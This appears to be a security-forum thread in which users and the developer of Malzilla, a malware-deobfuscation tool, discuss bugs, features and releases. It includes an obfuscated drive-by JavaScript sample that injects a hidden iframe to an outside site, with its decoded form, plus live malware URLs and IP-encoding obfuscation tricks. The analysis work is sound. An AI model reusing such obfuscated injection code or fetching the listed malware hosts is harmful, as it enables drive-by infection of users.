I'll probably remove it from the next upload, as I really can't find whats wrong, as the code looks OK.
@all
Does the new handling of eval() function do a better job for you than previous hacks?
-
* I havent had any issues with the new eval() handling.
* I suggest that you put an option to not display splash screen instead of removing it (this seems to be a standard in software today).. that way you can still have a splash :)
TJS
-
@TJS
Try the script from Tutorial 5 on Malzilla's website to see the power of the new eval() handling.
After that, try the same script with older versions (pre-release 3) if you still have them (I've deleted them from the server).
In older releases you could only get some info by taking a look at the variables in debugger.
With new version you will get the complete script :)
-
Very nice!!
Does this introduce any additional security risk? I'll buy beer for anyone that finds a way to get malzilla to execute a payload using some scripting magic and discloses it to bobby in a responsible manner.
Another crazy suggestion:
How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.
8)
TJS
-
How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.
Why not just use the SpiderMonkey API and a wrapper script to automate this for your standard JavaScript obfustication? Before I started using Malzilla (which I love now) for most of my analysis I would use Perl wrapper scripts and the SpiderMonkey engine, pipe this output into a database which would then allow me to perform relational comparisons.... Not the end all be all solution, but done fairly easily. Then for any obfucticated scripts you can't parse with your current script libraries use Malzilla, translating your findings into your automated scripts for future occurrences. I say again, I love using Malzilla and Bobby has done an outstanding job, but an automated solution would be optimal.... On the other hand maybe an open API would boost support and use of Bobby's creation, maybe???
-
@TJS
If SpiderMonkey itself is vulnerable, then the Malzilla would also be vulnerable.
There is no additional risk added by this hack.
All that this hack is doing is to log what the eval() function got as arguments.
Each call will produce a file in eval_temp folder.
After script completes, Malzilla will eliminate duplicates in eval_temp, and show you the rest.
About automation, I did think about it (using PScript from Malzilla), but it is not so easy.
Malzilla is multi-thread application, and a lot of events are based on callback functions.
Using them in in environment that is not object-oriented is a real pain.
Example: when you run a script in decoder, Mailzilla's main thread (the user interface) is not waiting for the decoding thread to finish (that would freeze the interface). When the thread finishes, it calls a callback function in Malzilla, letting it know that the results are waiting to be displayed.
Thats just reminded me that there is bug in Malzilla :)
If you run a script which takes some time to finish, and create a new Decoder tab before the results are there, the results will be displayed on new tab, not on the tab from where you've sent them.
@cjeremy
Can you make a short tutorial on how you are running Malzilla under Wine on Linux? Please.
-
@MysteryFCM
There is no offense meant by putting your script there under such title. It is just so that you found an extraordinary example.
Breaking the unicode sequences in a such way like in your script - I didn't saw anything like that before, and I'm really happy that you found it.
It was a reason to add concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.
I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formating:
http://malzilla.blogspot.com/
I gave up on that blog.
No offense taken :)
-
@bobby
Not much of tutorial I am afraid. It is very simple if you can get the prerequisite wine installed and running. There are a million tutorials for installing wine and specific instructions can depend upon which distro your using. For Ubuntu/Kubuntu Gutsy (7.10) it is fairly simple just:
1. sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/gutsy.list -O /etc/apt/sources.list.d/winehq.list
2. sudo apt-get update
3. sudo apt-get install wine
Once wine is installed then it as simple as follows:
1. wget http://superb-west.dl.sourceforge.net/sourceforge/malzilla/malzilla_0.9.3pre4.zip (from your favorite sourceforge mirror)
2. mv malzilla_0.9.3pre4.zip ~/.wine/drive_c/Program\ Files/
3. cd ~/.wine/drive_c/Program\ Files/
4. unzip malzilla_0.9.3pre4.zip
5. cd malzilla_0.9.3pre4/
6. wine malzilla.exe & ( execute it with wine )
This works for me, but as anything in the world of software your mileage may vary!
--jeremy
-
Guys, I apologize, but something is wrong with the previous upload.
At creating the ZIP to upload, my file manager didn't added the folders, just the files.
This is very important, as some function do not work without all the temp folders.
I've fixed this in the manner that Malzilla is now creating all the missing folders if these are not already there.
Some other interface bugs are fixed too.
Please download the new ZIP (0.9.2.5) from SourceForge.
-
Is it possible to have the space between "Send script to decoder" and "Find objects" made smaller. Also the space below "Find objects", so that the main download part can be a tiny bit bigger. The bits I am talking about have black lines by them in the picture below.
(http://img247.imageshack.us/img247/1706/17827789pf5.png)
Also could the space between "URL", "User Agent", "Referrer" and "Cookies" be made a little smaller so that the main download part can be a little bigger.
-
@JohnC
Done.
I also did that you can collapse/expand that panel.
@cjeremy
May I get your permission to post your tutorial on Malzilla's web site?
-
@bobby
No worries, go for it! Not much of tutorial though ;)
-
...he-he,I really like the way that Malzilla has pretty much evolved in being THE standard,
when it comes to analyzing infected/obfuscated webpages... :)
http://www.securityfocus.com/blogs/716
-
Nice catch sowhat-x... I am really proud that I'm involved with this project in some way.
Keep up the great work, bobby. :)
TJS
-
Thanks guys :)
I'll try to get another upload this weekend. Nothing special changed. There is one more redirection method detected in HTTP headers (thanks JohnC), and little GUI redesign to get more space for page source on Download tab.
I also started some other additions (take a look at right-click menu), but it is still not complete (just internal scripts are working for now).
One more thing is missing in case/log mode, and I'll try to fix it tomorrow.
Next Friday I'm going to vacancy for 3 weeks, and I won't have internet connection (neither a PC at all :) )
-
Another feature request:
How about associating hxxp with malzilla so that we can embed hxxp links in webpages and have them automatically load up with malzilla? That'll save us from having to do lots of copy/pasting from MDL (and other sites) into Malzilla :P
Just another random idea for after your vacations :)
TJS
-
:-[ I only found out about Malzilla yesterday, its certainly more efficent than Lynx, and i love the decoding functions, sure beats doing it the hard way.
An idea, were seeing more and more FTP RFIs than just a few months ago, any possibility of porting Malzilla for FTP grabs ?
-
@tjs
Doesn't the Clipboard monitor do the job similar to what you request?
@Orac
I'll do something about FTP grabs, but I can do it when I come back from the vacancy.
-
I've had a few bad experiences with the clipboard monitor so I haven't experimented with it too much. I'll check it out.
-
Clipboard monitor can be annoying sometimes.
It monitors clipboard for links (keywords can be defined on Settings tab).
In the beginning, it was a problem that he grabbed all the links twice (double entries in the list).
I've solved that by clearing the clipboard after getting the links.
Solution for Malzilla, but it was a problem for other apps running.
Now, it does not clear the clipboard (other apps should not experience problems while Malzilla is running), but it tries to detect double entries and delete them from the list.
The current problem now is that Clipboard Monitor does also detect internal copy/paste of links inside Malzilla (I do not find this useful) as Malzilla is using the Windows' clipboard.
-
Sorry guys, I didn't succeed in preparing the new release before I go to vacancy (tomorrow morning).
It is full with half-backed functions, and I would not like to upload it in such state.
See you in 3 weeks (3 weeks without a PC :) ).
-
Have fun dude :)
-
Have a nice time away :)
-
Thanks guys.
The following is not official release (but you can get it if you want to try it):
http://rapidshare.com/files/108547702/malzilla.exe.html
You will need the dll files from the latest official version of Malzilla:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804&release_id=587544
Whats is half-backed:
- you will see "Run script" in right-click menu (works on selected text, or on whole text if no selection is made). Internal scripts are working, external are not implemented at all
- the state of "Use referrer" on Download page is not saved in INI file for the next session
- Download panel - button panels can be hidden (click anywhere between the buttons) to extend the space for downloaded source and HTTP headers. There is problems with some combinations of resizing the form and hide/unhide the panels - buttons are not always restored to the right position
- some JavaScripts can break Malzilla if "Debug" is used. It does not break if "Run script" is used. It manifests in cleaning all the settings, URL history etc. This bug affects all the previous versions of Malzilla. I can't do a lot here, except of preventing Malzilla to overwrite the settings files with empty ones. This is not an exploit for Malzilla. It is just that Debugger does not finish working (gets stuck), and you need to kill Malzilla. Malzilla will receive the termination signal, and it will do the closing operations (saving settings) which are empty because the thread containing the settings (GUI) is not responding. All the settings files will be overwritten with empty files.
There may be something else that I can't recall at the moment.
Cheers,
bobby
-
Hope you have a great vacation Bobby
Ive had another idea for Malzilla, within the HTTP header section adding the resloved DNS and connection information would be very helpful, especailly when faced with redirects. example Resolving ess.trix.net... 200.201.192.41, 200.201.192.31
Connecting to ess.trix.net[200.201.192.41]:80... failed: No route to host.
Connecting to ess.trix.net[200.201.192.31]:80... connected.
-
Looks like SANS is now using Malzilla as part of their training
http://www.sans.org/training/description.php?mid=54
TJS
-
hi bobby:
<script>
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
var D8BE9398766CD = 676;
D8BE9398766CD = D8BE9398766CD - 660;
D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
var E24A10 = 122;
E24A10 = E24A10 - 120;
var D7502F1FF7C = "";
for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
{
D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
}
eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>
this script may caused Malzilla's decoder as "Working..." state. I choose replace eval() with method and filled in document.write as you know.
but it keeps this state..
and I decode it manually.
vyn=document.getElementById('kig');
if(vyn==null)
{
document.write('<iframe id=kig src=http://verossa.info style=display:none></iframe>');
}
-
Hi jimmyleo,
Use last build and chose "Leave as is" option. You will get the same result like the one you got manually.
-
yeap, got it ;D
and another bug? maybe
link following:
hxxp://xindizhi88.com/ai/Yes.htm
jsencode, at first glance. and MZ only decode part of it, and remain is messy characters.
jimi :)
-
Thanks for reporting this bug.
It has something to do with conversion between ASCII and Unicode.
The script decodes OK until first non-English character appears, and it goes into a mess after that.
Please use this online JScript.encode decoder until I get this bug fixed:
http://www.greymagic.com/security/tools/decoder/decoder.asp
-
A little preview of what I'm working on:
http://rapidshare.com/files/122620084/malzilla_preview.zip.html
News:
- handling HTTPS by using OpenSSL (saw a malware last week, which was hosted on a HTTPS)
- minor GUI changes
- internal minimalistic HTML render (still does not handle all HTML tags)
- better Format Code (at least I think it is better). Major difference is that FC will not touch anything inside quotation marks. FOR loops handling is also done better.
- Link Parser - it does Line select now, a click on a line will select the whole line
- Tools - some improvements and new edit functions
- Download tab - please test new option in tab's right-click menu: New tab (next step). Current URL will be a referrer on new tab, and cookies are set. Note that cookies set by scripts in HTML code are not handled, just cookies from HTTP headers are processed by Malzilla
Bugs:
- JSEncode decoder goes messy with Unicode chars in code (JSEncode does not work with Unicode, one need to translate the code page, and even worse - one need to know which code page was in use)
- probably more bugs
- probably even more bugs
ToDo:
- implement more DOM objects (href, location etc.)
- stop working on Malzilla if Symantec and SANS guys keep cropping the screenshots so that the title "Malzilla by bobby" gets cut off from the pictures they post in the blogs. More than that, make a JScript that Symantec and SANS guys can't decode with current Malzilla, and tell them you won't improve Malzilla until they post the whole screenshots
- or implement nag screens which will affect just the Symantec guys (and others who feel embarrassed if they mention that they are using Malzilla) :)
Regressions:
- some JS functions not working anymore (alert, dialogs)
To explain the regression with some JS functions - as of moving the complete interaction with SpiderMonkey into a separate thread, and as a thread isn't a part of GUI (GUI is part of main thread), SpiderMonkey can't access any GUI-related things anymore. This is the next thing I'll work on.
-
Can you upload it here please? (I've tried numerous times but I'll be damned if I can get the RS captcha correct ??? )
-
http://malzilla.sf.net/malzilla_preview.zip
Too big to be attached to a post here. I've uploaded to Malzilla site.
Please report bugs, both in GUI and in handling JavaScripts.
If anyone want to send me a script which can't be handled, please save it from Malzilla as a project file (Settings > Download > Add project info to saved files) or please provide the complete URL, referrer, User Agent and cookies.
A lot of scripts are depending on these parameters, and can't be deobfuscated if these are not known.
-
Nice one, cheers :)
-
In a real hurry at the moment,can't really reply properly... :-\
Too big to be attached to a post here.
For future reference:
since people have complained more than a few times about it,he-he... :D
i've increased attachments' file size up to 2mb...
- handling HTTPS by using OpenSSL
Won't say more - that's really damned good news 8)
Just something that quickly came to mind,
not a suggestion,just trying to give out ideas...
maybe you'd also like to have a look at MatrixSSL:
http://www.matrixssl.org/
It's 'supposedly' more lightweight/easy to use than OpenSSL...
- probably more bugs
- probably even more bugs
Lmao! ;D
We all put 100% trust on you -> but I guess you already knew that... ;)
So,I translate this to:
- probably more of excellent hard work from bobby
-
Ive had a quick play with the preview, really like the "New tab (next step)" and can see that coming in useful.
Ive had problems with HTTPS a few times in recent months, this addition will be a major help.
Also like the mini HTML view that should prove to have its uses.
Will comment further when ive used it for a few days.
Many thanks for all the hard work you do for us all :)
-
I got a new bug to report today...
Found a drive-by that pads script with nulls... Malzilla really didn't like this, and neither did textpad's search/replace function.
Here is the original malicious page:
hxxp://ch.moneybee.net/blog/kehker/hker.htm
Let me know if it goes down and you need a copy attached.
Ex:
3C00000000000068000000007400000000006D00006C00003E0000000000000D0A0000000000002000000000000000200000000000003C7300000063000000000000007200000000000000690000007000000000000000007400000000000000
TJS
-
@tjs
Attached to this post is an updated EXE with additional function to remove nulls.
Right click on text box containing NULLs (Decoder, Download, any other text box) > Run Script (internal) > Remove NULLs
-
Forgot to say - Concatenate function is updated too.
Now it can handle even something like the following:
"T" + 'e' & "s" + 't'
-
You rock!
-
One small point.
With Malzilla 0.9.3pre5 we have a box that can be check marked for "Auto-redirect" under Settings/Download
This box is missing from the new version, and instead we get a pop up asking if we want to follow the redirect.
Persoanlly iam finding this pop up to be a bit of a pain, would it be possible to have the Auto-redirect check box back as per 0.9.3pre5
-
:-[ Ooopppppppps forget my post above, just found it on the download page :-[
/me books an appointment with the opticans
-
Hi Orac,
It is my fault I didn't mentioned it.
I found it more useful to be on the first page.
I'm not known as someone who is taking notes of what is done/changed/etc. You can see that from the changelogs :)
Next few days I'll do a review of the code. I need to take a look if everything is logged in log/case mode.
After that I'll push another official download on Malzilla's website.
Any suggestions that can be implemented with less work/modifications?
After this version, I'll really go for implementing more DOM objects.
The easiest way is to have them as templates that implements new DOM objects in realtime.
This way anyone can make his own templates which would implement the missing DOM objects.
Guess some of you have no clue what I'm talking about, but it will be much easier when I show that with examples.
-
Any suggestions that can be implemented with less work/modifications?
I have no idea how much work or modifications would be involved with either of these, but do have two "wish list" items
1. Porting Malzilla for FTP.
2. In the HTTP header section adding resloved DNS and IP connection(s).
-
Hi Orac,
What would you exactly want about FTP?
Just a possibility to download a file from FTP, or a full-featured FTP client (two panels - local and remote folder etc.)
Just getting a file from FTP isn't so hard to do. For Filezilla-alike client I would need a lot of time.
About resolving DNS and such - I have no clue how to do that. I know almost nothing about the theory of resolving DNS servers, lookups and such.
-
Maybe Synapse is of interest...
it provides support for both ftp/dns,works under both win32/*nix...
Heh,just noticed it also has some kind of support for OpenSSL also:
http://www.ararat.cz/synapse/doku.php/features
One older nice piece of code that I keep around for reference,
usable under both win32/*nix...in C though:
http://benoit.papillault.free.fr/c/socket/dns.c
-
Bobby,
For resolving you can use the Windows API :)
gethostbyname
gethostbyaddr
Both a part of the wsock32 DLL
I wrote an AX to do it for my server if you'd like a copy?
-
...gethostbyname/gethostbyaddr functions are actually..."Berkeley sockets" API,lol... ;)
http://en.wikipedia.org/wiki/Berkeley_sockets
-
hehe
-
Winsock 2 functions for Delphi...Jedi provides that,
but my guess is that this info is not really something new/helpful to bobby... :-\
http://jedi-apilib.sourceforge.net/
Here's also an alternative Winsock2 delphi unit implementation,
coded from Aphex,lol...semi-'hackish' source :)
-
Thanks Bobby
All i want to be able to do is get a file from FTP port 21 using Malzilla, more RFIs are now using FTP:// in place of HTTP://
For example heres an active one from last weeks logs, ftp://193.253.223.43/tmp/trem/oldbisok
A fully featured FTP isnt required, neither is the ability to signin into the FTP port, i just want to grab the file and run. Iam currently using Lynx to do this, if that fails ive had success using a plain vanilla copy of Firefox. Ive never tried with IE, grabing live malware with IE doesnt appeal lol
-
This is a lot of posts to answer :)
@Orac
I'll try to make a simple FTP handling this weekend.
@sowhat-x
Malzilla uses Synapse for HTTP, and I'll use it for FTP too.
There is a TraceRoute example in Synapse package, but it does not work always. It works well on trying traceroute to Yahoo, but never works for Google.
Here is the main problem - I think I have a solution to get the IP of a website, but I want to do it in one single step with the HTTP "GET" (opening a website).
If anyone can recall, Malzilla got the most attention exactly because it accessed MPack sites in one single step. If you use a downloader that does "HEAD" before "GET", it gets banned from MPack (and other *pack sites).
Now, I'm not sure if asking a DNS server for the IP in one step, and doing it again in HTTP "GET" would produce some false results. I guess it can do if the DNS server is malicious, or resolves to other IP every time you ask for a website.
See, I must find a way to do it in one single step, either by hacking Synapse to get the results right from HTTP "GET" command, or asking on Synapse mailing list if this is already implemented (I couldn't find it last night in the API), or as a last solution - rewrite Malzilla (not to use Synapse anymore, but to do low-level Winsocks calls).
I would not like to go away from Synapse. It would be a loooooooot of work to do.
So, thank you all on searching for a solution, but I need to get a solution for doing this by using Synapse, and to do it in one single DNS server access, which means I need to read the resolved IP address from Synapse at the step where Synapse is doing resolving the host in order to do HTTP GET.
-
...seems that we got destructed with ideas related either to the 'easiness' of daily use,
and/or the implementations of socket-related functions,thereby...
we completely ignored the actual malware-related implications that are involved... :(
=================
P.S:...not relevant with Malzilla itself...since the dns resolving thing got raised earlier,
I got interested today in searching around cross-platform sources for doing this...
Stumbled upon this one as well...if it's of interest to anyone:
http://aluigi.altervista.org/mytoolz/hostsdns.zip
-
@Orac
Basic FTP is implemented.
I need to fix some minor glitches before I upload a new build.
-
Many thanks Bobby :)
-
Orac, can you test this version (attached)?
If you have a file to download from FTP, use GET button (just like for HTTP).
If you want to see a content of a folder on FTP, use CTRL + GET button (URL must be a folder).
If you need to login to the server, use the standard URL scheme:
ftp://user:password@server.com(:port)/folder/file.txt
If the user and pass are not supplied, the following will be used (you must provide login data even for Anonymous access):
user: Anonymous
pass: aa@aa.aa
In the future I'll make this to be set up by the user (settings for anonymous user name and pass). As for now it is hardcoded.
Clipboard Monitor still does not have FTP protocol implemented.
-
Bobby Ive downloaded (twice) but it wont open, all iam getting is
malzilla.exe is not a valid Win32 application
-
Works fine here when I download it from my previous post.
Would you like that I upload it somewhere else for you?
Maybe you have connection problems at downloading from MDL.
-
I tried a cold reboot of the whole system, downloaded it again but it woudnt open for the same reason :(
Then tried a few other tricks, such as running it in windows 95 compatabilty mode, no change.
Checked the downloaded file, its 0 bytes !!
Ive not had a problem downloading from MDL before but may be worth trying another location. Like MysteryFCM ive had problems in the past using RS and i know others in the UK that have too, i think its something with our ISPs. But never had this kind of problem either here or from any of the other forums we all know and use.
If no one else reports the same problem, then it has to be my end.
-
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)
-
Try to grab the files from here:
http://malzilla.sourceforge.net/builds/
Grab just the Malzilla.exe if you already have the DLL files from your previous downloads.
-
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)
Here is how and where I test Malzilla:
Test of GZiped transfer - http://carsten.codimi.de/gzip.yaws/
Test of sent HTTP headers - http://c2.com/cgi/test/
Test of HTTPS - www.gmail.com - follow the first redirection
I still need to find where I can test FTP functionality. As for now, I'm doing it by testing the communication with FTP server of MyCity forum. I would like to find some test server, like the C2 test for HTTP headers.
-
That download worked.
Just tested it on some live ftp malware links, and it works perfectly :)
Thanks Bobby thats a great job youve done, next time your in the UK i owe a few beers, afraid i cant help with suitable test sites, the only links ive got are either live malware, or they have been cleaned up.
-
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:
* when using a link with hxxp, the tab name is named hxxp: instead of domain name
example:
hxxp://test.com (tab title: hxxp:)
http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them
Thanks,
TJS
-
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
-
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:
* when using a link with hxxp, the tab name is named hxxp: instead of domain name
example:
hxxp://test.com (tab title: hxxp:)
http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them
Thanks,
TJS
Hi TJS,
- hxxp thing - fixed (fxp is translated to ftp too). I fixed this once, but it seems that it is gone after I reverted some changes (anyone recall my trying to make a splash screen?)
- spaces in about box fixed
- these are just test builds, neither the update info on the server or the version info in the Malzilla are set up. These are just test builds for us here. I'll set the right values for the formal release on SourceForge
Thanks for testing and reporting :)
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,
I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
-
Please download fixed build from http://malzilla.sourceforge.net/builds/
I have fixed the bugs reported by TJS.
-
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,
I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
That should be fine, thank you.
-
If I try to retrieve this directory with Malzilla using CTRL + GET
ftp://193.253.223.43/tmp/trem/
I see
06-19-08 10:50PM 681 1
06-19-08 10:50PM 20673 2
06-19-08 10:50PM 1244 old
06-19-08 10:50PM 1929 oldbisok
But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spιcifiι est introuvable. "
But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
-
If I try to retrieve this directory with Malzilla using CTRL + GET
ftp://193.253.223.43/tmp/trem/
I see
06-19-08 10:50PM 681 1
06-19-08 10:50PM 20673 2
06-19-08 10:50PM 1244 old
06-19-08 10:50PM 1929 oldbisok
But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spιcifiι est introuvable. "
But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
I know that one, I tried it at testing Malzilla's FTP capabilities. I got the same results.
After that I wanted to be sure, and tried it from Firefox, and I got exactly the same error like in Malzilla.
Which FTP client you have used and succeed in downloading the file?
-
FlashFXP. It sends RETR oldbisok
-
Hmmm... I just got the file by using Total Commander's integrated FTP client.
So, there is something with settings, as Malzilla and Firefox does not get it, but normal FTP clients does.
There is one basic difference between a ordinary FTP client and Malzilla.
FTP client logs in on the servers, and does not log out until you say so.
Malzilla logs in and out for every click on GET button.
I'll take a look now at connection parameters, to see if it has something to do with PASSIVE settings.
Some servers needs that mode for transferring binary files.
-
Sometimes a server will need PASV mode enabled/disabled to do stuff, in this case I just checked and it works either way. After logging in It also sends "TYPE I", if that helps you.
-
I saw where is the trick ;D
The file on the server has a malformed name - it contains space at the end.
Malzilla trim the spaces at the begin and end of the URL by default. This way I prevent mistakes done by bad copy/paste of links from text files or websites.
It seems that FireFox does it too.
What to do now?
To trim spaces or not to trim?
-
OK, get the new EXE from http://malzilla.sourceforge.net/builds/
Hold SHIFT at clicking on GET button, and the whitespaces will not be trimmed out.
To summarize the functions of GET button:
HTTP URLs:
- SHIFT = no trim
FTP URLs:
- SHIFT = no trim
- CTRL = LIST (works only if URL points to a folder)
- SHIFT + CTRL = no trim + LIST
btw. if you get LIST results and try to select (with cursor) behind the oldbiosk file, you will see that you have just one whitespace behind the filename.
FTP unit in Malzilla is now changed a lot (PASV + TYPE I + different parsing of filename and path from URL). Please report if something got broken that downloaded successfully with previous build (worked before changes, now does not work).
-
Downloaded the update yesterday, all seems to be working as intended.
Just used the FTP (on the three RFI links i posted earlier today) and it works perfectly.
Havnt got any new HTTPS links to test (yet), will report back on this aspect when i get one ;)
-
Possible bug
This link http://baptiste-bugnon.ch/help/ix.dat is a copy of Defacing Tool, the link to "//The Rules" want passed to the Links parser, neither was the link "<!-- saved from url=" at the top of the script.
-
No, it is not a bug, it is a feature :)
Malzilla does just what every webspider does - follow the HREF links.
It does not search for every link in the file. Links from textual part of file, links from comments and the links from scripts are not on the list in Link Parser.
I will now explain why is this done this way.
I DO have code that will catch every single URL, even from binary files, but this is far from perfect for HTML files.
Namely, most of the links in HTML files are relative paths (eg. "/images/image.gif")
Those would be missed by my other code that I have.
The current code in Malzilla is searching for every HREF, see if it is relative or absolute path. If it is relative, it search for Base tag (not necessary present in every HTML document). If Base is found, then the absolute paths are calculated relative to this basis. If Base tag is not present, the current URL (from URL box on Download tab) is taken as basis for calculating. See Link Parser tab, "URI base" field. If there stays "URI base (detected)", it means that the HTML contains Base tag. If stays "URI base (not detected)", it means that the URL from Download tab>URL box is used for calculation.
As an example, save any HTML page that does not contain Base tag in HTML header, and where some relative URLs are existing in the document.
Now open a new Download tab and load this document. Take a look at LinkParser - you will not have complete URLs anymore because Malzilla does not know the basis URL.
A solution is to save pages as 'Malzilla projects' (see Settings tab). This way extra info is added to every saved HTML page (does not destroy the page as the info is added in the form of comments). At loading such HTML in Malzilla next time, Malzilla will know the base URL, UserAgent and referrer used.
Now, I can add extra list in LinkParser that will contain all the links detected by a regular expression. That will catch every ABSOLUTE URL (relative URLs can't be found with such function), no matter if the URL is in comment or anywhere else in the document.
More info on Base tag:
http://www.w3schools.com/TAGS/tag_base.asp
-
Thanks for the explanation Bobby, iam surprised i hadnt noticed it before.
I can only assume this must have been the first time weve seen this particular exploit where the rules file hasnt been a HREF link, and as such the skiddie has in fact borked the script, which is meant to load that file as an add on to the scripts defacing abilities.
The particular link in this script has in fact been 404 for a couple of years now, which allways gives me a laugh, you would have thought they would check its availabilty before attempting to use the script for a RFI lol.
-
Small glitch I've noticed in latest beta,not really important though...
1)Get the latest 'officially' released zip from sourceforge (0.9.3pre5) and extract it...
2)Extract latest devel/test build of malzilla.exe (overwriting the older one),
run it,then simply press the "Mini Html View" button...
"Cannot create file "C:\path-to-malzilla-dir\Cache\tempview".The system cannot find blah-blah..."
Maybe it should automatically create the "Cache" folder upon startup or something...
-
Indeed, Cache folder is created when you do the first download.
I'll correct this bug.
Thanks ;)
-
ISC is reporting on some new javascript trickery:
http://isc.sans.org/diary.html?storyid=4724
Thanks,
TJS
-
Bug & Suggestions:
I think there's a bug in the latest beta build involving the Hex (%) decoder. The bug doesn't exist in older variants, and I was able to repro the issue on several machines.
Issue: hex encoded strings are not decoded properly.
Example: <script src=http://%7A%73%68%61%63%6B%2E%63%6E> decodes to:
<script src=http:?zshack.c6E>
This is incorrect. %7A%73%68%61%63%6B%2E%63%6E should resolve as zshack.cn.
---
Next, some suggestions for the decoder section-- i've started seeing some malware sites using various IP encoding schemes to obfuscate their payload addresses. They are simple to reverse, but it would be nice to have one built into malzilla. Here are some examples:
hex IP encoding
Octal IP encoding
DWord IP encoding
Hybrid encoding (have fun!)
Here are some examples:
http://207.46.197.32
---------------------
http://0xCF.0x2E.0xC5.0x20
http://0317.056.0305.040
http://00317.0056.00305.0040
http://3475948832
http://7770916128
http://12065883424
http://16360850720
http://0xCF2EC520
I can help you with the calculations if you aren't familiar with this stuff...
Great resouce: http://www.searchlores.org/obscure.htm (not malware)
Thanks!!
TJS
-
Thanks for reporting the bug. It is indeed a BUG.
If you use Decode hex button - you see the bug.
If you use right-click menu > Run script (internal) > decode hex - it works like it should.
I'll take a look what I did wrong.
I'll also take a look at that IP encoding. Thanks for mentioning this, I have forgot about such IP encoding. I saw that kind of obfuscation only once, a couple of years ago, and I forgot about it.
-
My pleasure, friend. :)
-
After a lot of time...
http://malzilla.sourceforge.net/builds/
Please download updated files from this folder (you do not need to download the DLL files if you already have them, these are not updated).
Changelog:
Bugfixes:
- Misc Decoders rewrite
- Cookies tab (in Download tab) fixed. It does not mix cookies from various tabs anymore
- Hex vies (in Download tab) fixed. Does not show wrong data (from wrong tab) anymore
- improvements in Mini HTML view
- other that I already forgot
Additions:
- new tool on Tools tab - IP converter (see TJS' post)
- decoder Templates
Decoder Templates are code snippets to be added to script before decoding. Some of the variables from snippets will be automatically replaced with values from Malzilla. See Docs folder, there is a list of variables that would be replaced in templates with values from Malzilla (e.g. malzilla.location.href will be replaced with the content of URL filed on Download tab).
This should help a bit at deobfuscating scripts that are using non-trivial DOM objects.
More templates to come.
All the templates need to be in Templates folder if you want them to appear on the list of templates.
So, if everything goes fine, this will be Malzilla 1.0
Things that are not implemented (and probably will not be implemented because of complexity):
- downloading from FTP on Clipboard Monitor tab
- multi-language interface (we have started this once, but it takes a lot of time that I do not have)
-
Nice one dude :)
-
Bobby,
Malzilla doesn't seem to detect the iFrame SRC's for the links or iFrames tab for the following;
http://www.sanseng.com/eng/Product.asp
/edit
My bad, forgot to click to send to links parser hehe
-
The 'IP converter' tool is excellent!! I really like the UI. I'll do some deep testing later on and let you know what I find. :)
TJS
-
Reply #178 on: August 12, 2008, 12:53:41 PM »
I'll do some deep testing later on and let you know what I find.
Spec tjs got into some pretty deep shit,eh? ;D
-
hmm, is there an easy way to decode these unicode html entities?
http://opana.cn/ya.html
http://opana.cn/all.html
-
hmm, is there an easy way to decode these unicode html entities?
http://opana.cn/ya.html
http://opana.cn/all.html
Decoded
http://opana.cn/ya.htmlhttp://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here (http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html)
-
In Malzilla, you can do that on Misc Decoders tab.
btw. hopefully, I will release Malzilla 1.0 today - it will have most robust decoders ever (for unicode, hex, dec...)
-
Malzilla 1.0 released:
http://sourceforge.net/project/showfiles.php?group_id=203466
-
Nice one dude :)
-
Thanks Bobby :)
-
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.
Keep up the fantastic work, Bobby!
TJS
-
The following code gives Access Violations in Malzilla.
